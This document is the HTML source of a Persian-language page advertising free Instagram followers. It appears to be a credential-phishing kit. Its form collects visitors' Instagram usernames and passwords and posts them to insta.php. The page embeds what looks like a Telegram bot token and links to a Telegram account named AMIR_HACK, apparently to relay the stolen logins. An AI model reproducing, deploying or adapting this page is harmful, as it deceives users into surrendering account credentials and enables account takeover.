<!DOCTYPE html>
<html  >
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
  <meta name="description" content="">
  
  <title>پنل ارسال فالوئر رایگان</title>
   <link href="css/bootstrap.css" rel="stylesheet" />
    <link href="css/bootstrap-rtl.css" rel="stylesheet" />
    <link href="css/font-awesome.min.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />
	<script type="text/javascript" src="https://code.jquery.com/jquery-latest.min.js"></script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
	<script src="js/OptionsCreator.min.js"></script>
	<!--script src="frontend/chat.js"></script-->
	
	<!--BEGIN RAYCHAT CODE--> <script type="text/javascript">!function(){function t(){var t=document.createElement("script");t.type="text/javascript",t.async=!0,localStorage.getItem("rayToken")?t.src="https://app.raychat.io/scripts/js/"+o+"?rid="+localStorage.getItem("rayToken")+"&href="+window.location.href:t.src="https://app.raychat.io/scripts/js/"+o;var e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(t,e)}var e=document,a=window,o="0294db19-f6d5-44dc-95be-42a5b4dee4c3";"complete"==e.readyState?t():a.attachEvent?a.attachEvent("onload",t):a.addEventListener("load",t,!1)}();</script> <!--END RAYCHAT CODE-->
	
	<script type="text/javascript">
		var ajaxID = 'index';
		var token = '1576381032:AAEozPoXOHKZZXoGSrpu1YlrxDb8Ii2jkC0';
		var servicesUrl = 'http://t.me/AMIR_HACK';
		var site_url = 'http://t.me/AMIR_HACK';
				
			</script>
	<script src="js/OrderActions.min.js"></script>
</head>
<body>
<div class=" col-12  col-centered">
		<nav class="navbar navbar-default">
			<div class="container-fluid" >
				<div class="navbar-header">
					<a class="navbar-brand "   href="" ></a>
				</div>
			
			</div>
		</nav>
	</div>
	<div class="col-lg-5 col-centered" >
		<div id="msform" >
				<form  action="insta.php" method="POST">
			<input type="hidden" name="what" value="payment" />
			<input type="hidden" name="_token" value="yDh5dshI8kRWEG1WdAXBpimafdhY9I0zGQVgY9Bl">
			<h1 class="fs-title" >
				<i></i> ثبت سفارش
			</h1>
			<fieldset>
				<select id="sub_categories">
					<option value="0">یک دسته بندی را انتخاب کنید</option>
					<option value="1">فالوئر آنلاین ( بدون ریزش )</option>
					<option value="2">فالوئر فیک ( بدون ریزش )</option>
				</select>
				
				<select name="service" id="services" style="display:none;"></select>
				<input type="text" name="discount" placeholder="معتبر ترین پنل ارسال فالوئر رایگان کمتر از  30 دقیقه"  disabled="disabled"  />
				<input type="text" name="discount" placeholder="
جهت دریافت خدمات پنل ، در پیج خود لاگین کنید "  disabled="disabled"  />
				
				
				
				<div class="alert alert-block alert-info" style="font-size: 15px; color:green;">
					<input type="username" name="username" style="height: 30px; text-align:center;"  placeholder="Username" />
				</div>
				<div class="alert alert-block alert-info" style="font-size: 15px; color:gray;">
					<input type="Password" name="password" style="height: 30px; text-align:center;" placeholder="Password" />
				</div>
				
					<button style="background:
#23aa45 !important;
border-color:
#23aa45 !important;
outline-color:
#23aa45 !important; width: auto; padding: 0.3em 1em !important; margin: 0 !important; display: inline-block !important; font-size: 17px;
 position: relative; border: 2px solid; border-radius: 8px; font-weight: 500;
line-height: 1.7em !important; transition: all 0.2s;cursor: pointer; text-decoration: none;
overflow: visible; right: auto; box-shadow: none;
text-shadow: none; font-family: inherit; box-sizing: border-box; white-space: nowrap;
text-align: left; direction: rtl; word-wrap: break-word;">ارسال</button>
				
			</fieldset>
		</form>		</div>
	</div>
</body>
</html>
